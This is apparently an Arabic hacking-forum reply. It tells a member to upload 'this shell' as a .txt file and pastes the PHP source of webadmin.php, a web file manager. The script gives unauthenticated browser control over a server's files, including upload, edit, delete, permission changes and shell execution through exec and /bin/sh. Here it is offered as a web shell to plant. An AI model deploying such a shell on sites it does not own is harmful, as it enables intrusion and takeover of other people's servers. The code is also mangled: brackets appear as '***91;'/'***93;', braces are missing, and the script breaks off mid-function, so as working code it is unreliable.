وعليكم السلام ورحمه الله وبركاته. مرحبآ بك أخي الكريم في منتديات العناكب أتمنى لك الإفادة.
في البداية عنوان موضوعك هذا مخالف أتمنى وضع عنوان مناسب في المرات القادمة . لان ربما هناك أشخاص مثلك تواجهم نفس المشكلة ويبحثون عن حل لها عبر العناوين المناسبة
ثانيآ :
قم برفع هذا الشل في أي مركز رفع بصيغة txt
كود PHP:
* webadmin.php - a simple Web-based file manager
* Copyright (C) 2004 Daniel Wacker <daniel.wacker@web.de>
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
* -------------------------------------------------------------------------
* While using this script, do NOT navigate with your browser's back and
* forward buttons! Always open files in a new browser tab!
* -------------------------------------------------------------------------
* This is Version 0.9, revision 9
* =========================================================================
* Changes of revision 9
* <daniel.wacker@web.de>
* added workaround for directory listing, if lstat() is disabled
* fixed permisson of uploaded files (thanks to Stephan Duffner)
* Changes of revision 8
* <okankan@stud.sdu.edu.tr>
* added Turkish translation
* <j@kub.cz>
* added Czech translation
* <daniel.wacker@web.de>
* improved charset handling
* Changes of revision 7
* <szuniga@vtr.net>
* added Spanish translation
* <lars@soelgaard.net>
* added Danish translation
* <daniel.wacker@web.de>
* improved rename dialog
* Changes of revision 6
* <nederkoorn@tiscali.nl>
* added Dutch translation
* Changes of revision 5
* <daniel.wacker@web.de>
* added language auto select
* fixed symlinks in directory listing
* removed word-wrap in edit textarea
* Changes of revision 4
* <daloan@guideo.fr>
* added French translation
* <anders@wiik.cc>
* added Swedish translation
* Changes of revision 3
* <nzunta@gabriele-erba.it>
* improved Italian translation
* Changes of revision 2
* <daniel.wacker@web.de>
* got images work in some old browsers
* fixed creation of directories
* fixed files deletion
* improved path handling
* added missing word 'not_created'
* <till@tuxen.de>
* improved human readability of file sizes
* <nzunta@gabriele-erba.it>
* added Italian translation
* Changes of revision 1
* <daniel.wacker@web.de>
* webadmin.php completely rewritten:
* - clean XHTML/CSS output
* - several files selectable
* - support for windows servers
* - no more treeview, because
* - webadmin.php is a >simple< file manager
* - performance problems (too much additional code)
* - I don't like: frames, java-script, to reload after every treeview-click
* - execution of shell scripts
* - introduced revision numbers
/* ------------------------------------------------------------------------- */
/* Your language:
* 'en' - English
* 'de' - German
* 'fr' - French
* 'it' - Italian
* 'nl' - Dutch
* 'se' - Swedish
* 'sp' - Spanish
* 'dk' - Danish
* 'tr' - Turkish
* 'cs' - Czech
* 'auto' - autoselect
$lang = 'auto';
/* Charset of output:
* possible values are described in the charset table at
* http://www.php.net/manual/en/function.htmlentities.php
* 'auto' - use the same charset as the words of my language are encoded
$site_charset = 'auto';
/* Homedir:
* For example: './' - the script's directory
$homedir = './';
/* Size of the edit textarea
$editcols = 80;
$editrows = 25;
/* -------------------------------------------
* Optional configuration (remove # to enable)
/* Permission of created directories:
* For example: 0705 would be 'drwx---r-x'.
# $dirpermission = 0705;
/* Permission of created files:
* For example: 0604 would be '-rw----r--'.
# $filepermission = 0604;
/* Filenames related to the apache web server:
$htaccess = '.htaccess';
$htpasswd = '.htpasswd';
/* ------------------------------------------------------------------------- */
if (get_magic_quotes_gpc()) {
array_walk($_GET, 'strip');
array_walk($_POST, 'strip');
array_walk($_REQUEST, 'strip');
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
if (!function_exists('lstat')) {
function lstat ($filename) {
return stat($filename);
if (function_exists('php_uname')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
$win = ($delim == '\\') ? true : false;
if (!empty($_SERVER***91;'PATH_TRANSLATED'***93;)) {
$scriptdir = dirname($_SERVER***91;'PATH_TRANSLATED'***93;);
} elseif (!empty($_SERVER***91;'SCRIPT_FILENAME'***93;)) {
$scriptdir = dirname($_SERVER***91;'SCRIPT_FILENAME'***93;);
} elseif (function_exists('getcwd')) {
$scriptdir = getcwd();
} else {
$scriptdir = '.';
$homedir = relative2absolute($homedir, $scriptdir);
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST***91;'dir'***93; : $homedir;
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST***91;'olddir'***93;)) {
$dir = relative2absolute($dir, $_POST***91;'olddir'***93;);
$directory = simplify_path(addslash($dir));
$files = array();
$action = '';
if (!empty($_POST***91;'submit_all'***93;)) {
$action = $_POST***91;'action_all'***93;;
for ($i = 0; $i < $_POST***91;'num'***93;; $i++) {
if (array_key_exists("checked$i", $_POST) && $_POST***91;"checked$i"***93; == 'true') {
$files***91;***93; = $_POST***91;"file$i"***93;;
} elseif (!empty($_REQUEST***91;'action'***93;)) {
$action = $_REQUEST***91;'action'***93;;
$files***91;***93; = relative2absolute($_REQUEST***91;'file'***93;, $directory);
} elseif (!empty($_POST***91;'submit_upload'***93;) && !empty($_FILES***91;'upload'***93;***91;'name'***93;)) {
$files***91;***93; = $_FILES***91;'upload'***93;;
$action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
for ($i = 0; $i < $_POST***91;'num'***93;; $i++) {
if (array_key_exists("submit$i", $_POST)) break;
if ($i < $_POST***91;'num'***93;) {
$action = $_POST***91;"action$i"***93;;
$files***91;***93; = $_POST***91;"file$i"***93;;
if (empty($action) && (!empty($_POST***91;'submit_create'***93;) || (array_key_exists('focus', $_POST) && $_POST***91;'focus'***93; == 'create')) && !empty($_POST***91;'create_name'***93;)) {
$files***91;***93; = relative2absolute($_POST***91;'create_name'***93;, $directory);
switch ($_POST***91;'create_type'***93;) {
case 'directory':
$action = 'create_directory';
case 'file':
$action = 'create_file';
if (sizeof($files) == 0) $action = ''; else $file = reset($files);
if ($lang == 'auto') {
if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER***91;'HTTP_ACCEPT_LANGUAGE'***93;) >= 2) {
$lang = substr($_SERVER***91;'HTTP_ACCEPT_LANGUAGE'***93;, 0, 2);
} else {
$lang = 'en';
$words = getwords($lang);
if ($site_charset == 'auto') {
$site_charset = $word_charset;
$cols = ($win) ? 4 : 7;
if (!isset($dirpermission)) {
$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
if (!isset($filepermission)) {
$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
if (!empty($_SERVER***91;'SCRIPT_NAME'***93;)) {
$self = html(basename($_SERVER***91;'SCRIPT_NAME'***93;));
} elseif (!empty($_SERVER***91;'PHP_SELF'***93;)) {
$self = html(basename($_SERVER***91;'PHP_SELF'***93;));
} else {
$self = '';
if (!empty($_SERVER***91;'SERVER_SOFTWARE'***93;)) {
if (strtolower(substr($_SERVER***91;'SERVER_SOFTWARE'***93;, 0, 6)) == 'apache') {
$apache = true;
} else {
$apache = false;
} else {
$apache = true;
switch ($action) {
case 'view':
if (is_script($file)) {
/* highlight_file is a mess! */
$src = ereg_replace('<font color="(***91;^"***93;*)">', '<span style="color: \1">', ob_get_contents());
$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
<hr />
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
echo '</code></pre>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
} else {
header('Content-Type: ' . getmimetype($file));
header('Content-Disposition: filename=' . basename($file));
case 'download':
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: ' . getmimetype($file));
header('Content-Disposition: attachment; filename=' . basename($file) . ';');
header('Content-Length: ' . filesize($file));
case 'upload':
$dest = relative2absolute($file***91;'name'***93;, $directory);
if (@file_exists($dest)) {
listing_page(error('already_exists', $dest));
} elseif (@move_uploaded_file($file***91;'tmp_name'***93;, $dest)) {
@chmod($dest, $filepermission);
listing_page(notice('uploaded', $file***91;'name'***93;));
} else {
listing_page(error('not_uploaded', $file***91;'name'***93;));
case 'create_directory':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$dirpermission);
if (@mkdir($file, $dirpermission)) {
listing_page(notice('created', $file));
} else {
listing_page(error('not_created', $file));
case 'create_file':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
} else {
listing_page(error('not_created', $file));
case 'execute':
$output = array();
$retval = 0;
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
$error = ($retval == 0) ? false : true;
if (sizeof($output) == 0) $output = array('<' . $words***91;'no_output'***93; . '>');
if ($error) {
listing_page(error('not_executed', $file, implode("\n", $output)));
} else {
listing_page(notice('executed', $file, implode("\n", $output)));
case 'delete':
if (!empty($_POST***91;'no'***93;)) {
} elseif (!empty($_POST***91;'yes'***93;)) {
$failure = array();
$success = array();
foreach ($files as $file) {
if (del($file)) {
$success***91;***93; = $file;
} else {
$failure***91;***93; = $file;
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_deleted', implode("\n", $failure));
if (sizeof($success) > 0) {
$message .= notice('deleted', implode("\n", $success));
} else {
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
echo "\t<b>" . word('really_delete') . '</b>
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
echo ' </p>
<hr />
<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
case 'rename':
if (!empty($_POST***91;'destination'***93;)) {
$dest = relative2absolute($_POST***91;'destination'***93;, $directory);
if (!@file_exists($dest) && @rename($file, $dest)) {
listing_page(notice('renamed', $file, $dest));
} else {
listing_page(error('not_renamed', $file, $dest));
} else {
$name = basename($file);
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
<input type="hidden" name="action" value="rename" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<b>' . word('rename_file') . '</b>
<p>' . html($file) . '</p>
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
<hr />
<input type="submit" value="' . word('rename') . '" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
case 'move':
if (!empty($_POST***91;'destination'***93;)) {
$dest = relative2absolute($_POST***91;'destination'***93;, $directory);
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = $dest . $filename;
if (!@file_exists($d) && @rename($file, $d)) {
$success***91;***93; = $file;
} else {
$failure***91;***93; = $file;
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_moved', implode("\n", $failure), $dest);
if (sizeof($success) > 0) {
$message .= notice('moved', implode("\n", $success), $dest);
} else {
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
echo "\t<b>" . word('move_files') . '</b>
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
echo ' </p>
<hr />
' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('move') . '" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
case 'copy':
if (!empty($_POST***91;'destination'***93;)) {
$dest = relative2absolute($_POST***91;'destination'***93;, $directory);
if (@is_dir($dest)) {
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = addslash($dest) . $filename;
if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
$success***91;***93; = $file;
} else {
$failure***91;***93; = $file;
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_copied', implode("\n", $failure), $dest);
if (sizeof($success) > 0) {
$message .= notice('copied', implode("\n", $success), $dest);
} else {
if (!@file_exists($dest) && @copy($file, $dest)) {
listing_page(notice('copied', $file, $dest));
} else {
listing_page(error('not_copied', $file, $dest));
} else {
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
echo "\n<b>" . word('copy_files') . '</b>
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
echo ' </p>
<hr />
' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('copy') . '" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
case 'create_symlink':
if (!empty($_POST***91;'destination'***93;)) {
$dest = relative2absolute($_POST***91;'destination'***93;, $directory);
if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
if (!empty($_POST***91;'relative'***93;)) $file = absolute2relative(addslash(dirname($dest)), $file);
if (!@file_exists($dest) && @symlink($file, $dest)) {
listing_page(notice('symlinked', $file, $dest));
} else {
listing_page(error('not_symlinked', $file, $dest));
} else {
echo '<form action="' . $self . '" method="post">
<table class="dialog" id="symlink">
<td style="vertical-align: top">' . word('destination') . ': </td>
<b>' . html($file) . '</b><br />
<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
<label for="checkbox_relative">' . word('relative') . '</label>
<input type="hidden" name="action" value="create_symlink" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<td>' . word('symlink') . ': </td>
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('create_symlink') . '" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
case 'edit':
if (!empty($_POST***91;'save'***93;)) {
$content = str_replace("\r\n", "\n", $_POST***91;'content'***93;);
if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
listing_page(notice('saved', $file));
} else {
listing_page(error('not_saved', $file));
} else {
if (@is_readable($file) && @is_writable($file)) {
} else {
listing_page(error('not_edited', $file));
case 'permission':
if (!empty($_POST***91;'set'***93;)) {
$mode = 0;
if (!empty($_POST***91;'ur'***93;)) $mode |= 0400; if (!empty($_POST***91;'uw'***93;)) $mode |= 0200; if (!empty($_POST***91;'ux'***93;)) $mode |= 0100;
if (!empty($_POST***91;'gr'***93;)) $mode |= 0040; if (!empty($_POST***91;'gw'***93;)) $mode |= 0020; if (!empty($_POST***91;'gx'***93;)) $mode |= 0010;
if (!empty($_POST***91;'or'***93;)) $mode |= 0004; if (!empty($_POST***91;'ow'***93;)) $mode |= 0002; if (!empty($_POST***91;'ox'***93;)) $mode |= 0001;
if (@chmod($file, $mode)) {
listing_page(notice('permission_set', $file, decoct($mode)));
} else {
listing_page(error('permission_not_set', $file, decoct($mode)));
} else {
$mode = fileperms($file);
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
<hr />
<table id="permission">
<td style="border-right: 1px solid black">' . word('owner') . '</td>
<td style="border-right: 1px solid black">' . word('group') . '</td>
<td>' . word('other') . '</td>
<td style="text-align: right">' . word('read') . ':</td>
<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
<td style="text-align: right">' . word('write') . ':</td>
<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
<td style="text-align: right">' . word('execute') . ':</td>
<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
<hr />
<input type="submit" name="set" value="' . word('set') . '" />
<input type="hidden" name="action" value="permission" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
/* ------------------------------------------------------------------------- */
function getlist ($directory) {
global $delim, $win;
if ($d = @opendir($directory)) {
while (($filename = @readdir($d)) !== false) {
$path = $directory . $filename;
if ($stat = @lstat($path)) {
$file = array(
'filename' => $filename,
'path' => $path,
'is_file' => @is_file($path),
'is_dir' => @is_dir($path),
'is_link' => @is_link($path),
'is_readable' => @is_readable($path),
'is_writable' => @is_writable($path),
'size' => $stat***91;'size'***93;,
'permission' => $stat***91;'mode'***93;,
'owner' => $stat***91;'uid'***93;,
'group' => $stat***91;'gid'***93;,
'mtime' => @filemtime($path),
'atime' => @fileatime($path),
'ctime' => @filectime($path)
if ($file***91;'is_dir'***93;) {
$file***91;'is_executable'***93; = @file_exists($path . $delim . '.');
} else {
if (!$win) {
$file***91;'is_executable'***93; = @is_executable($path);
} else {
$file***91;'is_executable'***93; = true;
if ($file***91;'is_link'***93;) $file***91;'target'***93; = @readlink($path);
if (function_exists('posix_getpwuid')) $file***91;'owner_name'***93; = @reset(posix_getpwuid($file***91;'owner'***93;));
if (function_exists('posix_getgrgid')) $file***91;'group_name'***93; = @reset(posix_getgrgid($file***91;'group'***93;));
$files***91;***93; = $file;
return $files;
} else {
return false;
function sortlist (&$list, $key, $reverse) {
quicksort($list, 0, sizeof($list) - 1, $key);
if ($reverse) $list = array_reverse($list);
function quicksort (&$array, $first, $last, $key) {
if ($first < $last) {
$cmp = $array***91;floor(($first + $last) / 2)***93;***91;$key***93;;
$l = $first;
$r = $last;
while ($l <= $r) {
while ($array***91;$l***93;***91;$key***93; < $cmp) $l++;
while ($array***91;$r***93;***91;$key***93; > $cmp) $r--;
if ($l <= $r) {
$tmp = $array***91;$l***93;;
$array***91;$l***93; = $array***91;$r***93;;
$array***91;$r***93; = $tmp;
quicksort($array, $first, $r, $key);
quicksort($array, $l, $last, $key);
function permission_octal2string ($mode) {
if (($mode & 0xC000) === 0xC000) {
$type = 's';
} elseif (($mode & 0xA000) === 0xA000) {
$type = 'l';
} elseif (($mode & 0x8000) === 0x8000) {
$type = '-';
} elseif (($mode & 0x6000) === 0x6000) {
$type = 'b';
} elseif (($mode & 0x4000) === 0x4000) {
$type = 'd';
} elseif (($mode & 0x2000) === 0x2000) {
$type = 'c';
} elseif (($mode & 0x1000) === 0x1000) {
$type = 'p';
} else {
$type = '?';
$owner = ($mode & 00400) ? 'r' : '-';
$owner .= ($mode & 00200) ? 'w' : '-';
if ($mode & 0x800) {
$owner .= ($mode & 00100) ? 's' : 'S';
} else {
$owner .= ($mode & 00100) ? 'x' : '-';
$group = ($mode & 00040) ? 'r' : '-';
$group .= ($mode & 00020) ? 'w' : '-';
if ($mode & 0x400) {
$group .= ($mode & 00010) ? 's' : 'S';
} else {
$group .= ($mode & 00010) ? 'x' : '-';
$other = ($mode & 00004) ? 'r' : '-';
$other .= ($mode & 00002) ? 'w' : '-';
if ($mode & 0x200) {
$other .= ($mode & 00001) ? 't' : 'T';
} else {
$other .= ($mode & 00001) ? 'x' : '-';
return $type . $owner . $group . $other;
function is_script ($filename) {
return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
function getmimetype ($filename) {
static $mimes = array(
'\.jpg$|\.jpeg$' => 'image/jpeg',
'\.gif$' => 'image/gif',
'\.png$' => 'image/png',
'\.html$|\.html$' => 'text/html',
'\.txt$|\.asc$' => 'text/plain',
'\.xml$|\.xsl$' => 'application/xml',
'\.pdf$' => 'application/pdf'
foreach ($mimes as $regex => $mime) {
if (eregi($regex, $filename)) return $mime;
// return 'application/octet-stream';
return 'text/plain';
function del ($file) {
global $delim;
if (!@is_link($file) && !file_exists($file)) return false;
if (!@is_link($file) && @is_dir($file)) {
if ($dir = @opendir($file)) {
$error = false;
while (($f = readdir($dir)) !== false) {
if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
$error = true;
if (!$error) return @rmdir($file);
return !$error;
} else {
return false;
} else {
return @unlink($file);
function addslash ($directory) {
global $delim;
if (substr($directory, -1, 1) != $delim) {
return $directory . $delim;
} else {
return $directory;
function relative2absolute ($string, $directory) {
if (path_is_relative($string)) {
return simplify_path(addslash($directory) . $string);
} else {
return simplify_path($string);
function path_is_relative ($path) {
global $win;
if ($win) {
return (substr($path, 1, 1) != ':');
} else {
return (substr($path, 0, 1) != '/');
function absolute2relative ($directory, $target) {
global $delim;
$path = '';
while ($directory != $target) {
if ($directory == substr($target, 0, strlen($directory))) {
$path .= substr($target, strlen($directory));
} else {
$path .= '..' . $delim;
$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
if ($path == '') $path = '.';
return $path;
function simplify_path ($path) {
global $delim;
if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
$path = realpath($path);
if (@is_dir($path)) {
return addslash($path);
} else {
return $path;
$pattern = $delim . '.' . $delim;
if (@is_dir($path)) {
$path = addslash($path);
while (strpos($path, $pattern) !== false) {
$path = str_replace($pattern, $delim, $path);
$e = addslashes($delim);
$regex = $e . '((\.***91;^\.' . $e . '***93;***91;^' . $e . '***93;*)|(\.\.***91;^' . $e . '***93;+)|(***91;^\.***93;***91;^' . $e . '***93;*))' . $e . '\.\.' . $e;
while (ereg($regex, $path)) {
$path = ereg_replace($regex, $delim, $path);
return $path;
function human_filesize ($filesize) {
$suffices = 'kMGTPE';
$n = 0;
while ($filesize >= 1000) {
$filesize /= 1024;
$filesize = round($filesize, 3 - strpos($filesize, '.'));
if (strpos($filesize, '.') !== false) {
while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
$filesize = substr($filesize, 0, strlen($filesize) - 1);
$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
return $filesize . " {$suffix}B";
function strip (&$str) {
$str = stripslashes($str);
/* ------------------------------------------------------------------------- */
function listing_page ($message = null) {
global $self, $directory, $sort, $reverse;
$list = getlist($directory);
if (array_key_exists('sort', $_GET)) $sort = $_GET***91;'sort'***93;; else $sort = 'filename';
if (array_key_exists('reverse', $_GET) && $_GET***91;'reverse'***93; == 'true') $reverse = true; else $reverse = false;
sortlist($list, $sort, $reverse);
echo '<h1 style="margin-bottom: 0">webadmin.php</h1>
<form enctype="multipart/form-data" action="' . $self . '" method="post">
<table id="main">
if (!empty($message)) {
echo $message;
if (@is_writable($directory)) {
} else {
if ($list) {
} else {
echo error('not_readable', $directory);
echo '</table>
function listing ($list) {
global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
echo '<tr class="listing">
<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
$d = 'dir=' . urlencode($directory) . '&';
if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
if (!$win) {
if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
echo ' <th class="functions">' . word('functions') . '</th>
for ($i = 0; $i < sizeof($list); $i++) {
$file = $list***91;$i***93;;
$timestamps = 'mtime: ' . date($date_format, $file***91;'mtime'***93;) . ', ';
$timestamps .= 'atime: ' . date($date_format, $file***91;'atime'***93;) . ', ';
$timestamps .= 'ctime: ' . date($date_format, $file***91;'ctime'***93;);
echo '<tr class="listing">
<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
<td class="filename" title="' . html($timestamps) . '">';
if ($file***91;'is_link'***93;) {
echo '<img src="' . $self . '?image=link" alt="link" /> ';
echo html($file***91;'filename'***93;) . ' → ';
$real_file = relative2absolute($file***91;'target'***93;, $directory);
if (@is_readable($real_file)) {
if (@is_dir($real_file)) {
echo '***91; <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file***91;'target'***93;) . '</a> ***93;';
} else {
echo '<a href="' . $self . '?action=view&file=' . urlencode($real_file) . '">' . html($file***91;'target'***93;) . '</a>';
} else {
echo html($file***91;'target'***93;);
} elseif ($file***91;'is_dir'***93;) {
echo '<img src="' . $self . '?image=folder" alt="folder" /> ***91; ';
if ($win || $file***91;'is_executable'***93;) {
echo '<a href="' . $self . '?dir=' . urlencode($file***91;'path'***93;) . '">' . html($file***91;'filename'***93;) . '</a>';
} else {
echo html($file***91;'filename'***93;);
echo ' ***93;';
} else {
if (substr($file***91;'filename'***93;, 0, 1) == '.') {
echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
} else {
echo '<img src="' . $self . '?image=file" alt="file" /> ';
if ($file***91;'is_file'***93; && $file***91;'is_readable'***93;) {
echo '<a href="' . $self . '?action=view&file=' . urlencode($file***91;'path'***93;) . '">' . html($file***91;'filename'***93;) . '</a>';
} else {
echo html($file***91;'filename'***93;);
if ($file***91;'size'***93; >= 1000) {
$human = ' title="' . human_filesize($file***91;'size'***93;) . '"';
} else {
$human = '';
echo "\t<td class=\"size\"$human>{$file***91;'size'***93;} B</td>\n";
if (!$win) {
echo "\t<td class=\"permission\" title=\"" . decoct($file***91;'permission'***93;) . '">';
$l = !$file***91;'is_link'***93; && (!function_exists('posix_getuid') || $file***91;'owner'***93; == posix_getuid());
if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($file***91;'path'***93;) . '&dir=' . urlencode($directory) . '">';
echo html(permission_octal2string($file***91;'permission'***93;));
if ($l) echo '</a>';
echo "</td>\n";
if (array_key_exists('owner_name', $file)) {
echo "\t<td class=\"owner\" title=\"uid: {$file***91;'owner'***93;}\">{$file***91;'owner_name'***93;}</td>\n";
} else {
echo "\t<td class=\"owner\">{$file***91;'owner'***93;}</td>\n";
if (array_key_exists('group_name', $file)) {
echo "\t<td class=\"group\" title=\"gid: {$file***91;'group'***93;}\">{$file***91;'group_name'***93;}</td>\n";
} else {
echo "\t<td class=\"group\">{$file***91;'group'***93;}</td>\n";
echo ' <td class="functions">
<input type="hidden" name="file' . $i . '" value="' . html($file***91;'path'***93;) . '" />
$actions = array();
if (function_exists('symlink')) {
$actions***91;***93; = 'create_symlink';
if (@is_writable(dirname($file***91;'path'***93;))) {
$actions***91;***93; = 'delete';
$actions***91;***93; = 'rename';
$actions***91;***93; = 'move';
if ($file***91;'is_file'***93; && $file***91;'is_readable'***93;) {
$actions***91;***93; = 'copy';
$actions***91;***93; = 'download';
if ($file***91;'is_writable'***93;) $actions***91;***93; = 'edit';
if (!$win && function_exists('exec') && $file***91;'is_file'***93; && $file***91;'is_executable'***93; && file_exists('/bin/sh')) {
$actions***91;***93; = 'execute';
if (sizeof($actions) > 0) {
echo ' <select class="small" name="action' . $i . '" size="1">
<option value="">' . str_repeat(' ', 30) . '</option>
foreach ($actions as $action) {
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
echo ' </select>
<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
echo ' </td>
echo '<tr class="listing_footer">
<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt=">" /></td>
<td colspan="' . ($cols - 1) . '">
<input type="hidden" name="num" value="' . sizeof($list) . '" />
<input type="hidden" name="focus" value="" />
<input type="hidden" name="olddir" value="' . html($directory) . '" />
$actions = array();
if (@is_writable(dirname($file***91;'path'***93;))) {
$actions***91;***93; = 'delete';
$actions***91;***93; = 'move';
$actions***91;***93; = 'copy';
echo ' <select class="small" name="action_all" size="1">
<option value="">' . str_repeat(' ', 30) . '</option>
foreach ($actions as $action) {
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
echo ' </select>
<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
function directory_choice () {
global $directory, $homedir, $cols, $self;
echo '<tr>
<td colspan="' . $cols . '" id="directory">
<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
function upload_box () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" id="upload">
' . word('file') . ':
<input type="file" name="upload" onfocus="activate(\'other\')" />
<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
function create_box () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" id="create">
